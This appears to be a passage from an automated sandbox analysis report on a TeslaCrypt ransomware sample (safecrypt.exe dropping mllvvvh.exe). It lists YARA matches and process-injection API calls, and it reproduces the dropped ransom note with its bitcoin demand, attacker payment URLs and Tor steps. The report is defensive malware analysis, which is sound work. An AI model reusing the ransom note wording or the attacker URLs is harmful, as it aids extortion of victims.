            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile dropped: C:\ProgramData\Adobe\ARM\S\1742\help_recover_instructions+fnc.txt -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?so, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining bitcoin now! , and restore your data easy way.if you have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:1. http://pot98bza3sgfjr35t.fausttime.com/bc324395252762332. http://h5534bvnrnkj345.maniupulp.com/bc324395252762333. http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/bc32439525276233if for some reasons the addresses are not available, follow these steps:1. download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. after a successful installation, run the browser and wait for initialization.3. type in the addJump to dropped file
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile dropped: C:\ProgramData\Adobe\ARM\S\help_recover_instructions+fnc.txt -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?so, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining bitcoin now! , and restore your data easy way.if you have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:1. http://pot98bza3sgfjr35t.fausttime.com/bc324395252762332. http://h5534bvnrnkj345.maniupulp.com/bc324395252762333. http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/bc32439525276233if for some reasons the addresses are not available, follow these steps:1. download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. after a successful installation, run the browser and wait for initialization.3. type in the addJump to dropped file
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile dropped: C:\ProgramData\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\help_recover_instructions+fnc.txt -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?so, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining bitcoin now! , and restore your data easy way.if you have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:1. http://pot98bza3sgfjr35t.fausttime.com/bc324395252762332. http://h5534bvnrnkj345.maniupulp.com/bc324395252762333. http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/bc32439525276233if for some reasons the addresses are not available, follow these steps:1. download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. after a successful installation, run the browser and wait for initialization.3. type in the addJump to dropped file

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000004.00000001.330553837.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 00000019.00000001.389132336.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 00000019.00000002.390167710.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 00000014.00000002.360977182.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 00000017.00000001.371854756.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 00000017.00000002.373053534.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 00000014.00000001.355902917.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 4.1.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 1.2.safecrypt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 1.1.safecrypt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 23.2.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 1.2.safecrypt.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 20.2.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 20.2.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 25.1.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 25.1.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 25.2.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 23.1.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 20.1.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 20.1.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 23.1.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 4.1.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 23.2.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 25.2.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 1.1.safecrypt.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess Stats: CPU usage > 98%
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681828 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681828
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681B1B CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681B1B
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_0268186D VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_0268186D
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681C63 NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681C63
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681A67 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681A67
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681A4C CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681A4C
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681C5C NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681C5C
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681852 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681852
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681A22 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681A22
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681A30 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681A30
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681836 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681836
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681C37 NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681C37
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681A0A CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681A0A
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681C00 NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681C00
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681C1C NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681C1C
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_026818E3 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_026818E3
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_026818FF CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_026818FF
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681AF1 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681AF1
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681ADB CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681ADB
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_026818D5 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_026818D5
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_026816A6 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_026816A6
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681AB1 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681AB1
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681A8C CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681A8C
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681899 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681899
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681892 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681892
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681A93 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681A93
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681B60 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681B60
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681963 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681963
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681B45 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681B45
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681946 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681946
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681B29 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681B29
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_0268193F CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_0268193F
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_0268191A CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_0268191A
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_026819ED CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_026819ED
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_026819F4 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_026819F4
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_026819C8 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_026819C8
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_026819AD CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_026819AD
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681B8C CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681B8C
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681983 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681983
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681B85 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681B85
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681991 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681991
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91828 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91828
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91B1B CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91B1B
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91ADB CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91ADB
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D918D5 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D918D5
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D918FF CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D918FF
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91AF1 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91AF1
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D918E3 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D918E3
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91899 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91899
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91A93 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91A93
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91892 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91892
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91A8C CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91A8C
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91AB1 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91AB1
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D916A6 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D916A6
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91C5C NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91C5C
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91852 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91852
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91A4C CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91A4C
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D9186D VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D9186D
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91C63 NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91C63
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91A67 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91A67
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91C1C NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91C1C
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91A0A CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91A0A
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91C00 NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91C00
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91A30 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91A30
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91C37 NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91C37
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91836 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91836
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91A22 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91A22
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D919C8 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D919C8
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D919F4 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D919F4
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D919ED CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D919ED
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91991 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91991
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91B8C CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91B8C
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91983 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91983
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91B85 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91B85
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D919AD CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D919AD
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91B45 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91B45
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91946 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91946
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91B60 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91B60
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91963 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91963
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D9191A CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D9191A
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D9193F CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D9193F
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D91B29 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,2_2_00D91B29
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_026818520_2_02681852
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_026816A60_2_026816A6
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_0041F3E01_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_004028101_2_00402810
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_004240201_2_00424020
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_004234211_2_00423421
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_0040FD501_2_0040FD50
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_004101501_2_00410150
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_004021601_2_00402160
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_0040B1601_2_0040B160
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_0040CD201_2_0040CD20
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_00420DF01_2_00420DF0
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_004245A71_2_004245A7
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_004251A51_2_004251A5
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_00402E601_2_00402E60
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_0040D2C01_2_0040D2C0
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_00421EE01_2_00421EE0
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_004182A01_2_004182A0
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_00419F601_2_00419F60
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_0041C7701_2_0041C770
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_00420B101_2_00420B10
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_004107C01_2_004107C0
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_0041D3D01_2_0041D3D0
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_0041C3E01_2_0041C3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_0041BF801_2_0041BF80
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_00410F801_2_00410F80
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_0041F3E01_1_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_004028101_1_00402810
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_004240201_1_00424020
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_004234211_1_00423421
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_0040FD501_1_0040FD50
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_004101501_1_00410150
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_004021601_1_00402160
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_0040B1601_1_0040B160
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_0040CD201_1_0040CD20
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_00420DF01_1_00420DF0
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_004245A71_1_004245A7
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_004251A51_1_004251A5
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_00402E601_1_00402E60
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_0040D2C01_1_0040D2C0
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_00421EE01_1_00421EE0
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_004182A01_1_004182A0
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_00419F601_1_00419F60
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_0041C7701_1_0041C770
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_00420B101_1_00420B10
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_004107C01_1_004107C0
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_0041D3D01_1_0041D3D0
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_0041C3E01_1_0041C3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_00410F801_1_00410F80
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_0041BF801_1_0041BF80
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D916A62_2_00D916A6
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 2_2_00D918522_2_00D91852
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_004182A04_1_004182A0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_0041C7704_1_0041C770
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_0041F3E04_1_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_004028104_1_00402810
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_004240204_1_00424020
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_004234214_1_00423421
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_0040FD504_1_0040FD50
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_004101504_1_00410150
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_004021604_1_00402160
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_0040B1604_1_0040B160
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_0040CD204_1_0040CD20
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_00420DF04_1_00420DF0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_004245A74_1_004245A7
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_004251A54_1_004251A5
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_00402E604_1_00402E60
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_0040D2C04_1_0040D2C0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_00421EE04_1_00421EE0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_00419F604_1_00419F60
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_00420B104_1_00420B10
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_004107C04_1_004107C0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_0041D3D04_1_0041D3D0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_0041C3E04_1_0041C3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_00410F804_1_00410F80
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_0041BF804_1_0041BF80
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_0041F3E020_2_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_0040281020_2_00402810
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_0042402020_2_00424020
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_0042342120_2_00423421
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_0040FD5020_2_0040FD50
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_0041015020_2_00410150
